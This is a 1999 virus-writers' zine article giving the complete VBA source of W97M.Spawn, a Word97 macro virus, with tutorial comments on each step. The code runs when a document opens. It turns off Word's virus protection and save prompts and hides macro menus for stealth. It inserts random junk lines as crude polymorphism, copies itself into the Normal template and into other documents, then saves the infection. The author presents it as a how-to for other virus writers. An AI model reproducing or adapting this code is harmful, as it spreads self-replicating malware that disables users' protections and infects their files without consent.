<-------------------------//LineZer0 Network 99\\------------------------->
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=


~Word97ClassMacro.Spawn~
========================

Identification:
~~~~~~~~~~~~~~~

	~Virusname: 	W97M.Spawn
	~Size:		29.184 Bytes ( 1 Macros )
	~Version:	A
	~Origin:  	Austria
	~Author:	jack twoflower / LineZer0 & Metaphase
	~Date:		April, 1999

Features:
~~~~~~~

	~Application	Word97
	~Payload: 	Nope
	~Stealth: 	Yes
	~Retro: 	Nope
	~SR-1 comp.: 	Yes
	~Polymorph:	Yes
	~Encrypted: 	Nope

    Hi all, hope you are not sleeping! Today we have a class object virus
which don't uses import/export technic, but stringcopy methode. So if you
are an advanced coder, this tutorial isn't for you, coz you might already
know the tech I use in this virus, all others reading on!

> This is a comment...
   
------------------------------[code starts here]---------------------------

Sub Document_Open()

> Executed when the doc is opened...

On Error Resume Next

> If there's an error go on...

Options.VirusProtection = (Rnd * 0)
Options.SaveNormalPrompt = (Rnd * 0)
Application.EnableCancelKey = wdCancelDisabled

> Turn off the things we don't need...

CommandBars("View").Controls("Symbolleisten").Enabled = (Rnd * 0)
CommandBars("Format").Controls("Formatvorlage...").Enabled = (Rnd * 0)
CommandBars("Tools").Controls("Makro").Enabled = (Rnd * 0)
CommandBars("Tools").Controls("Vorlagen und Add-Ins...").Enabled = (Rnd * 0)
CommandBars("Tools").Controls("Anpassen...").Enabled = (Rnd * 0)

> Basic stealth...

Set Normal_ = NormalTemplate.VBProject.VBComponents.Item(1)
Set Active_ = ActiveDocument.VBProject.VBComponents.Item(1)

> Set two object variables...

ActiveLines = Active_.CodeModule.CountOfLines
NormalLines = Normal_.CodeModule.CountOfLines

> Count the lines in the active document and in the template...


> This is some kind of polymorphic engine...changed APMRS, thanks Pyro

PolySize = Int(Rnd * 5)

> Set the size of the inserted code...

For PolyMorphic = 1 To PolySize

> Loop 1 to the size of our polymorphic code...

    PolyString = ""

> Clear the string were our junk code is stored...

    PolyLines = Application.VBE.ActiveVBProject.VBComponents _
     .Item(1).CodeModule.CountOfLines

> This are again the lines of the active project...

    RndLine = Int(Rnd * PolyLines) + 1

> Set a random line where the junk code will be inserted...

    StringSize = Int(Rnd * 39) + 1

> Set the size of the inserted string...

    For SomeString = 1 To StringSize
        PolyString = PolyString & Chr(65 + Int(Rnd * 22))
    Next SomeString

> Set the contents of the string...
    
    Application.VBE.ActiveVBProject.VBComponents _
     .Item(1).CodeModule.InsertLines RndLine, "Rem " & PolyString

> and insert it...

Next PolyMorphic

> 'Play it again Sam!'...

If NormalLines <> 0 Then NormalIns = True
If ActiveLines <> 0 Then ActiveIns = True

If NormalIns <> True Then
    Normal_.CodeModule.AddFromString _
    ("Sub Document_Close()" & vbCr & Active_.CodeModule _
     .Lines(2, ActiveLines))

> Here we insert the code of the active document into the normal template.
> As you know, you can't have same sub names, so we add 'Sub Document_Close
> and start in the second line of our code...

End If

If ActiveIns <> True Then
    Active_.CodeModule.AddFromString _
    ("Sub Document_Open()" & vbCr & Normal_.CodeModule _
     .Lines(2, NormalLines))

> Here the same as above...add 'Sub Document_Open' and start at the second
> line of the actual code...

    ActiveDocument.SaveAs ActiveDocument.FullName

> Save the doc...

End If

End Sub

------------------------------[code ends here]-----------------------------

    Ok, thats it. If you have any questions or whatever, send us a mail.
Thanks for reading.

Keep Vxing,                                                  jack twoflower

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
<-------------------------//LineZer0 Network 99\\------------------------->
